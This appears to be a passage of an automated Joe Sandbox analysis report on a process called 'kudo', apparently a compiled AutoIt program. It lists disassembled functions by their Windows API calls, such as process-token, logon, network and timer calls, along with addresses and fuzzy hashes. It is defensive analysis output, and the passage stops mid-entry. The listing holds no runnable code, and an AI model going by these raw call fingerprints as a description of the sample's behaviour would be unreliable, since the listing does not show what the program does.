                                                        • Part of subcall function 0082571C: __FF_MSGBANNER.LIBCMT ref: 00825733
                                                        • Part of subcall function 0082571C: __NMSG_WRITE.LIBCMT ref: 0082573A
                                                        • Part of subcall function 0082571C: RtlAllocateHeap.NTDLL(009E0000,00000000,00000001), ref: 0082575F
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      • API String ID: 614378929-0
                                                      • Opcode ID: c7ba92d1c158be5efb5143993e7bfe36f9acfd32b3e329c686cb477a91d82a4b
                                                      • Instruction ID: 5d668977d05c80681048010955b901e1f0e2492333cb3bb4e336bf297d2f458f
                                                      • Opcode Fuzzy Hash: c7ba92d1c158be5efb5143993e7bfe36f9acfd32b3e329c686cb477a91d82a4b
                                                      • Instruction Fuzzy Hash: 0811A072901A25AECF313F78BC45B5E3B98FF943A1F10492AF904DA251DE34898197D1
                                                      APIs
                                                      • _memset.LIBCMT ref: 008044CF
                                                        • Part of subcall function 0080407C: _memset.LIBCMT ref: 008040FC
                                                        • Part of subcall function 0080407C: _wcscpy.LIBCMT ref: 00804150
                                                        • Part of subcall function 0080407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00804160
                                                      • KillTimer.USER32(?,00000001), ref: 00804524
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00804533
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0083D4B9
                                                      Similarity
                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                      • String ID:
                                                      • API String ID: 1378193009-0
                                                      • Opcode ID: e01883e8a2b558bb9a1715b02e68ee79bfb127926422aeab39234559cf21692c
                                                      • Instruction ID: a3469038d53c9d457232e0b4aa49f43c911167095b367f06680fec7883d5107f
                                                      • Opcode Fuzzy Hash: e01883e8a2b558bb9a1715b02e68ee79bfb127926422aeab39234559cf21692c
                                                      • Instruction Fuzzy Hash: E721F5B1944784AFE7729B249C45BE6BBECFF41308F04009DE79AD6182C3742984CB85
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008585E2
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 008585E9
                                                      • CloseHandle.KERNEL32(00000004), ref: 00858603
                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00858632
                                                      Similarity
                                                      • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                      • String ID:
                                                      • API String ID: 2621361867-0
                                                      • Opcode ID: c893d8e2628e5a86dc569ab3c90fd065b425c1dc660065a7ce1db9c2f3182db8
                                                      • Instruction ID: 2c129426f429061a120ce8c2a89439c1c95990a8ca17b8422f2ee914af4a25e1
                                                      • Opcode Fuzzy Hash: c893d8e2628e5a86dc569ab3c90fd065b425c1dc660065a7ce1db9c2f3182db8
                                                      • Instruction Fuzzy Hash: DF114772501249EBDF019FA8DD49BEA7BA9FB08345F144065FE04E2161C7729E64AB60
                                                      APIs
                                                        • Part of subcall function 00805A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00867896,?,?,00000000), ref: 00805A2C
                                                        • Part of subcall function 00805A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00867896,?,?,00000000,?,?), ref: 00805A50
                                                      • gethostbyname.WS2_32(?), ref: 00876399
                                                      • WSAGetLastError.WS2_32(00000000), ref: 008763A4
                                                      • _memmove.LIBCMT ref: 008763D1
                                                      • inet_ntoa.WS2_32(?), ref: 008763DC
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                      • String ID:
                                                      • API String ID: 1504782959-0
                                                      • Opcode ID: 0bc822b4691457f8c1a7aa7c9b36c3675b4592748b6d3cb5d786f293102a42cf
                                                      • Instruction ID: 7487efab706f91f2545003d562307622a84f98f96326d031b2b2d5f0b4458610
                                                      • Opcode Fuzzy Hash: 0bc822b4691457f8c1a7aa7c9b36c3675b4592748b6d3cb5d786f293102a42cf
                                                      • Instruction Fuzzy Hash: D8112175500109AFCB04FBA8DD46CAE77B8FF04310B148065F505E72A2DB30DE54DB62
                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00858B61
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00858B73
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00858B89
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00858BA4
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 423cb7b883e04cd76d4539cefe97fe002ab8180c89bbea27509f5f5bf10b14c4
                                                      • Instruction ID: d5c0f017cbf9a8a97214d8953ab00913c96c729586b6c843adcafb7e1355e09f
                                                      • Opcode Fuzzy Hash: 423cb7b883e04cd76d4539cefe97fe002ab8180c89bbea27509f5f5bf10b14c4
                                                      • Instruction Fuzzy Hash: EC112E79901218FFDB11DF95CC85FADBB78FB48710F204196EA00B7250DA716E15DB94
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0085FCED,?,00860D40,?,00008000), ref: 0086115F
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0085FCED,?,00860D40,?,00008000), ref: 00861184
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0085FCED,?,00860D40,?,00008000), ref: 0086118E
                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,0085FCED,?,00860D40,?,00008000), ref: 008611C1
                                                      Similarity
                                                      • API ID: CounterPerformanceQuerySleep
                                                      • String ID:
                                                      • API String ID: 2875609808-0
                                                      • Opcode ID: eafa4b47c81375d2f13cd5d0d376c8b4847f899c43a54ba5f678cdefd4f915f0
                                                      • Instruction ID: d9ff1000856cd283be3ab9ac224244b768f61e23a4cd01859c4178791614aa48
                                                      • Opcode Fuzzy Hash: eafa4b47c81375d2f13cd5d0d376c8b4847f899c43a54ba5f678cdefd4f915f0
                                                      • Instruction Fuzzy Hash: AE114835C0052DD7CF009FA8D848AEEBB78FB0A711F064056EA40F2242CA749590CB95
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0085D84D
                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0085D864
                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0085D879
                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0085D897
                                                      Similarity
                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                      • String ID:
                                                      • API String ID: 1352324309-0
                                                      • Opcode ID: 01101c367c27e2b9edd5669aa348b270ec48564ba395744f7b8aac4eecf1a33b
                                                      • Instruction ID: 472f86956ab71887b5f0eaaf369db32484dbe500910f6972990e7a085dd5e987
                                                      • Opcode Fuzzy Hash: 01101c367c27e2b9edd5669aa348b270ec48564ba395744f7b8aac4eecf1a33b
                                                      • Instruction Fuzzy Hash: C6115E75605309DBE3308F54EC08F92BBBCFB00B05F108979AE16D6051D7B0E5499BA1
                                                      APIs
                                                      Similarity
                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                      • String ID:
                                                      • API String ID: 3016257755-0
                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                      • Instruction ID: b512b41e4082b4a4cc20c01d56e7b75367c1f3e9f98143a9abe26327f10dffa6
                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                      • Instruction Fuzzy Hash: 0B014EB244454EBBCF2A5E88CC51CED3F62FB58354F588415FA1898031D236C9B1ABC1
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 0088B2E4
                                                      • ScreenToClient.USER32(?,?), ref: 0088B2FC
                                                      • ScreenToClient.USER32(?,?), ref: 0088B320
                                                      • InvalidateRect.USER32(?,?,?), ref: 0088B33B
                                                      Similarity
                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                      • String ID:
                                                      • API String ID: 357397906-0
                                                      • Opcode ID: b8b061e71e577ec14668f2349cc17b6a2038dcf2caa6385093423318fac8c4ab
                                                      • Instruction ID: 64003bf9624fe73c4b2d6d0ebded1030da722b0dbd9cc10c2be24de1aab6ca25
                                                      • Opcode Fuzzy Hash: b8b061e71e577ec14668f2349cc17b6a2038dcf2caa6385093423318fac8c4ab
                                                      • Instruction Fuzzy Hash: 931147B5D00209EFDB41DF99C4449EEBBF5FF18310F104166E914E3220D735AA558F50
                                                      APIs
                                                      • _memset.LIBCMT ref: 0088B644
                                                      • _memset.LIBCMT ref: 0088B653
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,008C6F20,008C6F64), ref: 0088B682
                                                      • CloseHandle.KERNEL32 ref: 0088B694
                                                      Similarity
                                                      • API ID: _memset$CloseCreateHandleProcess
                                                      • String ID:
                                                      • API String ID: 3277943733-0
                                                      • Opcode ID: 4e8e6642fc54682df3489549b3e20d9816bddb10722afcb937772ac98a92db03
                                                      • Instruction ID: a8ca59feffe8975a546940a71881367c222998a8e1c8fdabf7ef69363e3f362f
                                                      • Opcode Fuzzy Hash: 4e8e6642fc54682df3489549b3e20d9816bddb10722afcb937772ac98a92db03
                                                      • Instruction Fuzzy Hash: A4F012B25503147BE3106765BC06FBB7AACFB09795F404039FB09E5192EB759C2087A9
                                                      APIs
                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 00866BE6
                                                        • Part of subcall function 008676C4: _memset.LIBCMT ref: 008676F9
                                                      • _memmove.LIBCMT ref: 00866C09
                                                      • _memset.LIBCMT ref: 00866C16
                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 00866C26
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                      • String ID:
                                                      • API String ID: 48991266-0
                                                      • Opcode ID: 2891495ce41ba0a741e13bd8dfbb9240875a887225c3748df6172a92bab4a41d
                                                      • Instruction ID: 6192b1c70f762bd0e8b4ebc28b55b2c5b4f9f404a71bd21fd92613c3469db87a
                                                      • Opcode Fuzzy Hash: 2891495ce41ba0a741e13bd8dfbb9240875a887225c3748df6172a92bab4a41d
                                                      • Instruction Fuzzy Hash: CEF05E3A200110BBCF016F59EC85A8ABB29FF45321F088061FE089E227D735E851CBB5
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 00802231
                                                      • SetTextColor.GDI32(?,000000FF), ref: 0080223B
                                                      • SetBkMode.GDI32(?,00000001), ref: 00802250
                                                      • GetStockObject.GDI32(00000005), ref: 00802258
                                                      • GetWindowDC.USER32(?), ref: 0083BE83
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0083BE90
                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0083BEA9
                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0083BEC2
                                                      • GetPixel.GDI32(00000000,?,?), ref: 0083BEE2
                                                      • ReleaseDC.USER32(?,00000000), ref: 0083BEED
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                      • String ID:
                                                      • API String ID: 1946975507-0
                                                      • Opcode ID: c78bb0b69ce0bb71bc77d93a51db75514e8bafe1d1348870c50a9b9283147116
                                                      • Instruction ID: 77a36fdf953611464867b504289c1e57c4b57368df26191eaee3bee9e7ecf743
                                                      • Opcode Fuzzy Hash: c78bb0b69ce0bb71bc77d93a51db75514e8bafe1d1348870c50a9b9283147116
                                                      • Instruction Fuzzy Hash: F8E06D72104244EADF225FA8FC4D7D83F10FB45332F108366FB69880E287B14990DB12
                                                      APIs
                                                      • GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,00858195,?,?,?,008582E6), ref: 0085871B
                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,008582E6), ref: 00858722
                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008582E6), ref: 0085872F
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,008582E6), ref: 00858736
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CurrentOpenProcessThreadToken
                                                      • String ID:
                                                      • API String ID: 3974789173-0
                                                      • Opcode ID: 6049c25ce03afdeb8bab8510603cae8e8202e72a6e88359c6e31a6f503c0d559
                                                      • Instruction ID: 7afa78c7594a68edfb7f5cf3e3ab5f687c37b2c0136d36f1fed940efc080bf1e
                                                      • Opcode Fuzzy Hash: 6049c25ce03afdeb8bab8510603cae8e8202e72a6e88359c6e31a6f503c0d559
                                                      • Instruction Fuzzy Hash: E6E08636611312DFD7205FF55D0CB563BACFF54792F244828B745D9051DB348445C750
                                                      APIs
                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 0085B4BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ContainedObject
                                                      • String ID: AutoIt3GUI$Container
                                                      • API String ID: 3565006973-3941886329
                                                      • Opcode ID: a4a1928a391ea8e171d4b243b73bbf5f220efd95e707daf0bb26f82b46c0185d
                                                      • Instruction ID: ece737603834adc2b651873fc9d3e2fcc5c4a4c963ec16b889e90026425fc7c2
                                                      • Opcode Fuzzy Hash: a4a1928a391ea8e171d4b243b73bbf5f220efd95e707daf0bb26f82b46c0185d
                                                      • Instruction Fuzzy Hash: 38915870200601AFDB24DF68C884AAABBE5FF59711F20856DED4ACB391EB70E845CB50
                                                      APIs
                                                        • Part of subcall function 0081FC86: _wcscpy.LIBCMT ref: 0081FCA9
                                                        • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                        • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                      • __wcsnicmp.LIBCMT ref: 0086B02D
                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0086B0F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                      • String ID: LPT
                                                      • API String ID: 3222508074-1350329615
                                                      • Opcode ID: 28f2ac2721d855aa5ac0a4d738c4a97fa610c5c9dd1134b553ec102331771779
                                                      • Instruction ID: 7f780b8a7b80032da2afb9e9d35bddc831c95ee9468cd312927ee3dba195aab0
                                                      • Opcode Fuzzy Hash: 28f2ac2721d855aa5ac0a4d738c4a97fa610c5c9dd1134b553ec102331771779
                                                      • Instruction Fuzzy Hash: 65616F75A00219AFCB14DF98C891EAEB7B4FF09314F118069F956EB391E770AE84CB51
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 00812968
                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00812981
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemorySleepStatus
                                                      • String ID: @
                                                      • API String ID: 2783356886-2766056989
                                                      • Opcode ID: 0b3409f7d06df94921f5a9e3a468e1762cc47491fc4d31d6204eb9fd7e2edad3
                                                      • Instruction ID: a50df8cbf0c3047a26835046827e24f69abeccd18e53b6c358d6f808a79342d2
                                                      • Opcode Fuzzy Hash: 0b3409f7d06df94921f5a9e3a468e1762cc47491fc4d31d6204eb9fd7e2edad3
                                                      • Instruction Fuzzy Hash: 715147714087449BD760AF18DC86BABBBE8FB85340F41885DF2D9811A2DB708568CB67
                                                      APIs
                                                        • Part of subcall function 00804F0B: __fread_nolock.LIBCMT ref: 00804F29
                                                      • _wcscmp.LIBCMT ref: 00869824
                                                      • _wcscmp.LIBCMT ref: 00869837
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp$__fread_nolock
                                                      • String ID: FILE
                                                      • API String ID: 4029003684-3121273764
                                                      • Opcode ID: ce3894ff41f91208a5e74e8e1964980804d18b6ef30a443043cf4f700f65f94f
                                                      • Instruction ID: c98faa896b68233360d1e07c34c9aad97f58f66b676087645809b8066644398a
                                                      • Opcode Fuzzy Hash: ce3894ff41f91208a5e74e8e1964980804d18b6ef30a443043cf4f700f65f94f
                                                      • Instruction Fuzzy Hash: 0F41A571A4021ABADF209AA8CC45FEFB7BDFF86714F010479FA04E71C1DA75A9048B61
                                                      APIs
                                                      • _memset.LIBCMT ref: 0087259E
                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008725D4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CrackInternet_memset
                                                      • String ID: |
                                                      • API String ID: 1413715105-2343686810
                                                      • Opcode ID: 7d9d4d52de7472a2d24fe7bb218836a7bff32ff90fd15afc91b44fbe430ce8c3
                                                      • Instruction ID: 7b9c244065f6be4588c5b4eb19cffa68487c27703d9bc79245041aa5c0d7e08c
                                                      • Opcode Fuzzy Hash: 7d9d4d52de7472a2d24fe7bb218836a7bff32ff90fd15afc91b44fbe430ce8c3
                                                      • Instruction Fuzzy Hash: 8E314871C00119ABCF51AFA4CC85EEEBFB8FF18350F10405AF908A6166EB319955CB61
                                                      APIs
                                                      • DestroyWindow.USER32(?), ref: 00886B17
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00886B53
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$DestroyMove
                                                      • String ID: static
                                                      • API String ID: 2139405536-2160076837
                                                      • Opcode ID: 03b72fd6812e03c88699c818fd760af661dc009bf24cdbf12e4cb331d51531ab
                                                      • Instruction ID: 6dce899856f08c66bd0bf9743f0faf1c6a0c786d3204d1e20e0503bbc9681094
                                                      • Opcode Fuzzy Hash: 03b72fd6812e03c88699c818fd760af661dc009bf24cdbf12e4cb331d51531ab
                                                      • Instruction Fuzzy Hash: C1318F71200604AEEB10AF68CC81FFB77B9FF88764F108619F9A5D7191EA31AC91C760
                                                      APIs
                                                      • _memset.LIBCMT ref: 00862911
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0086294C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: be743315e7ec26dd69aceecde3a8f9a2040b5d2d1348d332911388c373cb209b
